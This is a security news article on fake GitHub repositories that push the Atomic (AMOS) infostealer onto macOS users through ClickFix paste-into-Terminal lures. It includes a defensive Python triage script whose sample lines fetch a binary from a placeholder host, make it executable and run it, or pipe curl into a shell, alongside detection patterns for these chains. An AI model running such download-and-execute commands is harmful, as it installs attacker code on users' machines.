Fake Password Managers Infect macOS with Atomic Stealer

LastPass warns that threat actors are targeting macOS users by impersonating popular products on GitHub and pushing info-stealers disguised as legitimate installers.

Security teams say attackers create fake repositories that appear to host macOS software from well-known vendors, then use search-engine optimization to push those malicious links to the top of search results. In LastPass’s case, the fake repositories redirected visitors to a page that delivered the Atomic infostealer (also known as AMOS).

LastPass discovered two impersonating GitHub repositories published on September 16, 2025; both repositories have since been removed. The accounts behind the repositories — posted under the username modhopmduck476 — included links purporting to install LastPass on a Mac. Instead, those links led to a malicious webpage on macprograms-pro[.]com that persuaded users to copy and paste a command into a Terminal window.

That single pasted command decodes an encoded string and hands the result to the shell; the decoded command uses curl to fetch an "Update" binary into the user's temporary directory and then executes it. This is the social-engineering vector commonly called ClickFix: the victim is tricked into running a command they do not understand, and that one action installs the malware. It also sidesteps the usual macOS safeguard for downloaded software, because a file fetched with curl and launched from Terminal never receives the com.apple.quarantine attribute that would trigger a Gatekeeper check.
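The triage script below is an added example, not code from LastPass or from the campaign. It shows how to take a pasted one-liner of this kind apart before anyone runs it: unwrap embedded base64 layers (the page only says "encoded"; base64 is assumed here as the common ClickFix choice), pull out the URLs and temp-directory paths, and flag the fetch, drop and execute chain. The sample commands, URL and payload are constructed placeholders, not the campaign's real indicators.

```python
"""Triage a pasted Terminal one-liner: decode embedded base64 layers and
flag the fetch-drop-execute chain typical of ClickFix-style lures."""
import base64
import binascii
import re

MAX_DEPTH = 3  # stop unwrapping nested base64 after this many layers

RE_DECODE = re.compile(r'base64\s+(?:-d|-D|--decode)\b')
RE_SHELL_SINK = re.compile(r'\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b')
RE_FETCH = re.compile(r'\b(?:curl|wget)\b')
RE_URL = re.compile(r'https?://[^\s"\'|;&)]+')
RE_TEMP = re.compile(r'(?:\$\{?TMPDIR\}?|/private/tmp|/tmp)/[\w.-]+')
RE_CHMOD_X = re.compile(r'\bchmod\s+\+x\b')
RE_B64 = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')


def decode_layers(text, depth=0):
    """Return every embedded base64 blob that decodes to readable text, recursively."""
    if depth >= MAX_DEPTH:
        return []
    found = []
    for blob in RE_B64.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode('utf-8')
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text once decoded
        if not all(ch.isprintable() or ch in '\n\t' for ch in decoded):
            continue
        found.append(decoded)
        found.extend(decode_layers(decoded, depth + 1))
    return found


def _runs_temp_binary(text):
    """True if some command segment starts by invoking a file under a temp directory."""
    for seg in re.split(r'\s*(?:&&|\|\||;|\||\n)\s*', text):
        if RE_TEMP.match(seg.strip().strip('"\'')):
            return True
    return False


def analyze(cmd):
    """Return findings plus a verdict ('block', 'review' or 'benign-looking') for one pasted command."""
    layers = decode_layers(cmd)
    joined = '\n'.join([cmd] + layers)  # inspect the outer command and every decoded layer
    f = {
        'decode_then_exec': bool(RE_DECODE.search(cmd) and RE_SHELL_SINK.search(cmd)),
        'pipe_to_shell': bool(RE_SHELL_SINK.search(joined)),
        'remote_fetch': bool(RE_FETCH.search(joined)),
        'urls': sorted(set(RE_URL.findall(joined))),
        'temp_paths': sorted(set(RE_TEMP.findall(joined))),
        'executes_drop': bool(RE_CHMOD_X.search(joined)) or _runs_temp_binary(joined),
        'decoded_layers': layers,
    }
    if (f['decode_then_exec']
            or (f['remote_fetch'] and f['pipe_to_shell'])
            or (f['remote_fetch'] and f['temp_paths'] and f['executes_drop'])):
        f['verdict'] = 'block'
    elif f['remote_fetch'] or f['temp_paths']:
        f['verdict'] = 'review'
    else:
        f['verdict'] = 'benign-looking'
    return f


# Constructed samples: the URL, path and payload are placeholders, not the campaign's real ones.
INNER = ('curl -fsSL "https://example.invalid/dl" -o "$TMPDIR/Update" '
         '&& chmod +x "$TMPDIR/Update" && "$TMPDIR/Update"')
SAMPLE_ENCODED = 'echo ' + base64.b64encode(INNER.encode()).decode() + ' | base64 -d | bash'
SAMPLE_PLAIN = 'curl -fsSL https://example.invalid/install.sh | sh'
SAMPLE_BENIGN = 'ls -la ~/Downloads'

if __name__ == '__main__':
    for name, cmd in [('encoded', SAMPLE_ENCODED), ('plain', SAMPLE_PLAIN), ('benign', SAMPLE_BENIGN)]:
        r = analyze(cmd)
        print(f"{name}: {r['verdict']}  urls={r['urls']}  temp={r['temp_paths']}")
        for layer in r['decoded_layers']:
            print('  decoded:', layer)
```

The verdict is deliberately conservative: anything that decodes text and pipes it to a shell, or fetches from the network and pipes straight into a shell, is blocked outright, while a bare download without execution is only marked for review. The decoded layers are returned so an analyst can read the actual command that would have run.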

The downloaded binary is Atomic (AMOS), a macOS info-stealer first observed in 2023; recent builds add a backdoor component. According to researchers, this campaign has been active since at least July 2025.

The fraudsters have not limited themselves to LastPass. The campaign has impersonated financial institutions, other password managers, major tech companies, AI tools, crypto wallets, and productivity apps. Reported brand names include 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. To conceal activity and avoid takedown, attackers used numerous GitHub accounts and repeated naming patterns that combined the target brand with references to Mac.

Researchers say the campaign’s goals are typical for info-stealers: harvest credentials, session tokens, and other sensitive data that can be monetized or used for further attacks. The addition of a backdoor in recent Atomic builds raises the stakes, giving attackers persistent access to compromised systems.

How to protect yourself

  • Never paste commands from untrusted websites into Terminal. If you must run a command from the web, decode any encoded portion and read what it does first, and have a trusted peer or security professional review it before running it.
  • Download macOS software only from official vendor sites or verified app stores. Avoid third-party sites that mimic legitimate vendors.
  • Check a GitHub repository’s history and author before running or installing software. New accounts with few contributions are red flags.
  • Use endpoint protection and keep macOS and security tools up to date.
  • If you suspect compromise, disconnect the Mac from the network, assume that saved credentials and browser sessions on it are exposed, and rotate them from a clean device. Then run a full forensic examination or contact an incident response service.

The campaign highlights how simple social engineering combined with platform abuse can bypass casual safeguards. LastPass and other security teams continue to monitor and request takedowns of fraudulent repos; users should remain cautious when searching for software downloads.